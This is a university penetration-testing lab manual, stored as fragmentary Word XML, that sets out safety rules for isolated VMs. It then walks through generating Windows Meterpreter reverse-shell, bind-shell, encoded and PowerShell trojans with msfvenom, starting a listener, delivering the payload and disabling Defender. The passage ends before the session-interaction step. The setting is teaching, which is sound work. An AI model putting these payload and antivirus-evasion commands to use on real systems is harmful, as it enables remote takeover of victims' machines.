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C070D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CCS6324: Ethical Hacking and Penetration Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF7499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Week 3 - Lab Manual: Network and Computer Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD05909" w14:textId="5016C973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Duration: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hours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Week 3 (17-23 Nov 2025)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Instructor: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Hafiz Adnan Hussain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Assessment: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Malware Analysis Report (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- Lab Component)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F4AD47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5023F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FA82BC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CRITICAL SAFETY WARNINGS </w:t>
      </w:r>
      <w:r w:rsidRPr="00C34A8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⚠️</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A4207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AND ACKNOWLEDGE BEFORE STARTING LAB:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407FA9B0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malware-related activities MUST be conducted in isolated virtual machines ONLY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9DA105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run malware on your host machine or personal computer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46374616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VMs MUST be on internal/host-only network with NO internet access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51888AD7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Take VM snapshots BEFORE executing any malware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E433391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email, share, or upload actual malware files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731E3D3B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use malware techniques on unauthorized systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1FEE80" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34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Follow all instructor guidance and safety procedures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660D9E42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Violation of these rules may result in:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337D2A30" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C3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 lab dismissal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C82F9A" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C3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Failing grade for the course</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D721AE" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C3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Disciplinary action from the university</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0533D7EC" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34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legal consequences</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30EF25B1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F80413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85D08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Objectives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659E24C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this lab, students will be able to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF60703" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C3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up a safe, isolated malware analysis environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F77EFAE" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C3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trojans using msfvenom and understand payload generation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7732CE22" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C3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malware behavior using Process Monitor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731AEC14" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C3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antivirus detection capabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADFB3AC" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C3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Simulate DoS attacks in controlled environments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FCC9CB" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34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findings in a professional security report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D63168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654069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232599D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Pre-Lab Requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A4DF63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Software:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201A9C7A" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C3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(attacker machine)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F1C10C" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C3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10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(victim machine for malware analysis)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5087C333" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C3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Metasploitable 2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 target for DoS testing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03584D34" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34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VirtualBox or VMware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(virtualization platform)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9676E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Tools (pre-installed on Kali):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405CE399" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C3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msfvenom (Metasploit payload generator)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46943056" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C3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msfconsole (Metasploit Framework)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0F1F38" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34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hping3 (DoS testing tool)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652D8839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Tools for Windows 10 VM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECFED97" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C3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Monitor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(Sysinternals) - Download from: </w:t>
      </w:r>
      <w:hyperlink r:id="rId5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https://learn.microsoft.com/en-us/sysinternals/downloads/procmon</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="29DA8F80" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C3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Defender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(built-in)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BFEC94" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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Wireshark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(optional, for network analysis)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE3C3C2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Network Configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D9A2B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Kali Linux VM:      Internal Network (intnet) + NAT (for downloads only)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4944645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Windows 10 VM:      Internal Network (intnet) ONLY - NO NAT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCAC60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Metasploitable VM:  Internal Network (intnet) ONLY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011C0BF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C046551" w14:textId="66698476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All VMs should be able to ping each other</w:t>
      </w:r>
      <w:r w:rsidR="0036244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,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but NOT access the internet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAF92B1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08DE70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9B7378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Exercise 1: Environment Setup and Verification (20 minutes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA9989C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Configure Network Settings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0850869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VirtualBox/VMware:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14483A9B" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C3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Internal Network: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31FD076E" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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→ Network → Adapter 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5312C680" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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Attached to: Internal Network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1255F78A" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A8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Name: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labnet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any consistent name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07063736" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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IP Addresses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1480D07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Kali Linux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC9068C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bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370CE2A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sudo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ifconfig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eth0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.100.10 netmask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255.255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.255.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045F160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 10:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDDC936" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C3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→ Network → Change adapter options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7D0A50" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C3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Right-click adapter → Properties → IPv4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310175E8" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C3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IP: 192.168.100.20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20150CC4" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C3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Subnet: 255.255.255.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6297799E" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C3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Gateway: (leave blank)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68218800" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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DNS: (leave blank)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696B4D87" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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Verify Connectivity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548A129A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4FF880A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From Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6B5C6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ping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.100.20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C5CDC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F749274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From Windows (Command Prompt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26233E57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ping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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311B4D0C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Take Clean Snapshots</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F679D1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proceeding, take snapshots of all VMs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4502BCD2" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34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VirtualBox: Machine → Take Snapshot → Name: "Clean_Week3_Lab"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15129E22" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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VMware: VM → Snapshot → Take Snapshot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064929AA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allows you to revert to clean state after malware execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD011C9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Disable Windows Defender (Temporarily for Lab)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C471A3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10 VM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC6AEA4" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34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 → Update &amp; Security → Windows Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6726958E" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34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Virus &amp; threat protection → Manage settings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E444978" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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Turn OFF: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC3551D" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA50F2D" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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Cloud-delivered protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434422CA" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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sample submission</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F7796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We'll re-enable this later for detection testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF8111E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EE51AB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B5A368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Exercise 2: Creating Trojans with msfvenom (30 minutes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114AC21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2.1 Understanding msfvenom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C05E3F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msfvenom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payload generator that combines msfpayload and msfencode. It creates malicious payloads in various formats.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09079097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Syntax:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0242AF20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53450FE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msfvenom -p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payload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LHOST=&lt;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attacker_ip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LPORT=&lt;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port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-f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format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-o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&lt;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output_file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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B80E4D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Create Windows Reverse Shell Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD90D76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 Linux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E64887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247922A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Create a simple reverse shell executable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5633690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msfvenom -p windows/meterpreter/reverse_tcp \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D516E97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 \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080C550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5C277E0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-f exe \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721BD0F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-o ~/malware_lab/payload1.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302CE44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53D7EE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View payload information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633B713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file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~/malware_lab/payload1.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A721A8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ls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-lh ~/malware_lab/payload1.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06706997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Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218F705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[-] No platform was selected, choosing Msf::Module::Platform::Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D5931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[-] No arch selected, selecting arch: x86</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A77EEB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No encoder specified, outputting raw payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060E69E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Payload size: 354 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72029BC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Final size of exe file: 73802 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692057E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Saved as: payload1.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D9DF2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Create Multiple Payload Types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79530D5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different payload formats for comparison:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0233E6ED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1C2ED29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1. Windows 64-bit payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B52939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msfvenom -p windows/x64/meterpreter/reverse_tcp \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F4444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 \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEBEB0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77A51F5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lastRenderedPageBreak/>
        <w:t xml:space="preserve">  -f exe \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B07A1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-o ~/malware_lab/payload_x64.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5147A4D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48B643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2. Encoded payload (obfuscation attempt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3291180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msfvenom -p windows/meterpreter/reverse_tcp \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0352BFC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 \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1893C78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785958A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-e x86/shikata_ga_nai \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AB301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-i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5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40610DB7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-f exe \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66580F2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-o ~/malware_lab/payload_encoded.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B49432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4A2D53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3. Bind shell (listens on victim machine)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D962F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msfvenom -p windows/meterpreter/bind_tcp \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB7418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4458B12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-f exe \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1991F7D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-o ~/malware_lab/payload_bind.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDDF3E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0E2EE5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4. PowerShell payload (fileless)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDE3807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msfvenom -p windows/x64/meterpreter/reverse_tcp \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641835C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LHOST=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 \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD3762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LPORT=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\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E68506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-f psh \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E0FC3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-o ~/malware_lab/payload.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C37EB4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Set Up Metasploit Listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18499F7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 Linux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B786E0D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3622DB4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Start Metasploit console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7243754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msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F81FD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69EAEB6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In msfconsole:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745595E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use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12647D5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payload windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34290B8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LHOST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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AD331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LPORT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</w:p>
    <w:p w14:paraId="008D871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set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ExitOnSession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false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50837A3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exploit -j -z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF5083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Keep this terminal open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- it will catch connections from executed payloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79492907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Transfer Payload to Windows VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B7E5D6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1: Shared Folder (Recommended)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F8F29F" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34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shared folder in VM settings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04809A3A" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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Copy payload to shared location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A95C17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2: Python HTTP Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003EC0F7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27D78B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On Kali (make sure to add NAT adapter temporarily)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228C7B5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cd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~/malware_lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02649AA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python3 -m http.server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8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688EAFE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4FE48C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On Windows, open browser and download:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3BFBD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http://192.168.100.10:8080/payload1.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3A8F9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Option 3: USB passthrough or direct file transfer via VM tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A2D404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3F8FA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8AC809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Exercise 3: Malware Behavior Analysis with Process Monitor (40 minutes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCDB9E1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Install and Configure Process Monitor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B60E033" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34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Process Monitor on Windows VM from: </w:t>
      </w:r>
      <w:hyperlink r:id="rId6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https://learn.microsoft.com/en-us/sysinternals/downloads/procmon</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4E860148" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34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 and run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Procmon.exe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Procmon64.exe)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05EC11A2" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A8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running malware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configure filters:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6D2B9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Configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132E6BD2" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A8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→ Filter → Add these filters: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EB0597" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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Name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payload1.exe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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31427BCD" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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begins with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(registry operations)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E942A62" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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CreateFile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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752AD34E" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A8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Operation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TCP Connect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Include</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F95226" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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apply filters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D12431" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A8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current events: Edit → Clear Display</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636641F7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Capture Baseline (Before Execution)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FD9C96" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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note of current running processes (Task Manager)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706D09FF" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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Check registry key: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HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22255DDF" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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open network connections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8EEC96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cmd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C16EF4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netstat -ano</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E6B79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Execute Payload and Monitor Behavior</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1DB6D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SAFETY CHECK:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFBCBD8" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C3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VM is on internal network only? </w:t>
      </w:r>
      <w:r w:rsidRPr="00C34A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</w:p>
    <w:p w14:paraId="18C7D55E" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C3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Snapshot taken? </w:t>
      </w:r>
      <w:r w:rsidRPr="00C34A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</w:p>
    <w:p w14:paraId="45513DF5" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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 Monitor running? </w:t>
      </w:r>
      <w:r w:rsidRPr="00C34A87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</w:p>
    <w:p w14:paraId="58C2AC6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Execute the payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5DDC4A" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C3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Double-click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payload1.exe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Windows VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED8E50B" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C3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Immediately observe Process Monitor activity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D78886" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A8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Metasploit listener on Kali for connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349D58F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 (msfconsole), you should see:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136BD9B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[*] Meterpreter session 1 opened (192.168.100.10:4444 -&gt; 192.168.100.20:xxxxx)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8C52B1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Analyze Captured Behavior</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414D2AE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Process Monitor, observe:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48733775" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C3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System Activity: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07235A0D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Look for file creation/modification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72425054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 for dropped files in Temp directories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75109BC7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 any suspicious file operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1935057A" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C3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Registry Activity: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221FC741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Persistence mechanisms (Run keys, services)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382BC95A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Configuration changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D85924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keys created/modified</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E06C94" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A8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Network Activity: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CB253F0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Outbound connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604B1DCA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 IP and port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC2B51C" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A87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Protocol used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AACE2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Save Process Monitor logs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B2DBD2" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34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→ Save → Choose "All events" → Save as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payload1_procmon.PML</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A7EF97" w14:textId="77777777" w:rsidR="00C34A87" w:rsidRPr="00C34A87" w:rsidRDefault="00C34A87" w:rsidP="00C34A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Also export to CSV: File → Save → Choose CSV format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9F47B2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Interact with Meterpreter Session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058E81B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On Kali (in msfconsole):</w:t>
